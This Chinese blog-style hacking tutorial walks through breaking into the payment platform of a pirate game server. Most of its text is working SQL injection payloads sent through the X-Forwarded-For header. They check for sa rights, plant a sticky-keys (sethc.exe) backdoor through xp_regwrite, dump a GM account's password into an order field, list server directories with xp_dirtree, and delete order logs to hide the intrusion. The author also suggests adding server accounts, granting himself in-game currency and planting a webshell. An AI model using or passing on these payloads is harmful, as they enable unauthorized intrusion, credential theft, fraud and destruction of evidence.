今天给大家带来的是入侵传奇私服支付平台。
搜索关键字
由于时间关系我先找了一个站。
?gid=cq
算了这个站没开3389也难得搞下去。站我已经找好了。。
就这个?gid==514
下单抓包改包我们先测试下是不是sa权限。免得浪费时间。
?gid=cq
检测权限
X--,1,1,1,1,cast());--
[][ODBCSQLServerDriver][SQLServer]将nvarchar值sa转换为数据类型为int的列时发生语法错误。呵呵不错。开了3389我们替换他的shift
X-Forwarded-For:11,1,1,1,1,1);execmaster..xp_regwriteHKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsNTCurrentVersionImageFileExecutionOptionssethc.exe,debugger,REG_sz,c:windowssystem32cmd.exeon--
返回无错。。执行成功。接下来想干啥就干啥加账户进服务器。。或者查找平台上的gm账户密码给自己游戏里发元宝。。。。。
我下面也准备好了如果不是sa的情况下怎么继续入侵拿webshell.
爆出平台指定id的账户密码(显示在指定订单的充值卡号上)
X-Forwarded-For:11,1,1,1,1,1);updatemobile1setusercode=(selectusername+|+passwdfrommemberwhereid=543)wherenum=****22546319--
//num为自己下单的订单号,此处id为游戏平台gm账户id,
第一步:建立表
X-Forwarded-For:11,1,1,1,1,1);droptablefoofoofoo;createtablefoofoofoo([id][int]identity(1,1)notnull,[name][nvarchar](300)notnull,[depth][int]notnull,[isfile][nvarchar](50)null);--
第二步
X-Forwarded-For:11,1,1,1,1,1);declare@znvarchar(4000)set@z=0x65003A005C00insertfoofoofooexecutemaster..xp_dirtree@z,1,1--
//注意:0x63003a005c00=C:为sqlENCODE
d:0x64003A005C00
第三步暴出总数
X-Forwarded-For:11,1,1,1,1,1);updatemobile1setusercode=(selectcast(count(*)asvarchar(8000))+char(94)fromfoofoofoo)wherenum=****22546319--
第四步:暴出你想要的文件夹名字和文件名字
X-Forwarded-For:11,1,1,1,1,1);updatemobile1setusercode=(selecttop1cast([isfile]asnvarchar(4000))+char(94)+cast([name]asnvarchar(4000))from(selectdistincttop1*fromfoofoofooorderbyisfile,name)torderbyisfiledesc,namedesc)wherenum=****22546319--
修改distinct后面的数字,依次爆出。
一直爆找到站点目录然后备份木马到站点目录就可以拿到webshell时间关系我就不演示了。
谢谢观赏。。
byko高祖
附带删除下单日志
X-Forwarded-For:11,1,1,1,1,1);deletefrommobile1wherenumber=自己下单时候的账户--
发表评论